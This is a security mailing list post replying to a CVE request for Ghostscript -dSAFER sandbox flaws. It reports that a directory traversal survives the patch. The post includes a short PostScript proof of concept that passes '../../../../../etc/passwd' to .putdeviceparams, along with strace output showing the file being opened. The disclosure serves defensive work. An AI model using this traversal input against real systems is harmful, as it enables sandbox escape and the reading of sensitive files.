Date: Wed, 19 Oct 2016 16:29:43 +0200 From: Cedric Buissart <cbuissar@...hat.com> To: oss-security@...ts.openwall.com Cc: taviso@...gle.com Subject: Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign@...re.org> wrote: > > > > bug: various userparams allow %pipe% in paths, allowing remote shell > > command execution. > > id: http://bugs.ghostscript.com/show_bug.cgi?id=697178 > > repro: http://www.openwall.com/lists/oss-security/2016/09/30/8 > > patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h= > 71ac87493b1e445d6c07554d4246cf7d4f44875c > > Use CVE-2016-7976. > > There currently isn't a separate CVE ID for the earlier impact that > occurred when "b" was in the mode argument to popen. The question of > whether popen will execute anyway (even with the 'b" character) is, > more or less, a reachability concern in this context, and doesn't mean > that a second vulnerability needs to be defined. > > The original report for this bug (http://bugs.ghostscript.com/ show_bug.cgi?id=697178), as described by Florian, was mentioning a directory traversal issue. The directory traversal does not appear to be resolved after applying the given patch : $ cat putdevice-open.ps %!PS currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd) .putdeviceparams quit $ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6 Is it expected ? -- Cedric Buissart, Product Security
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ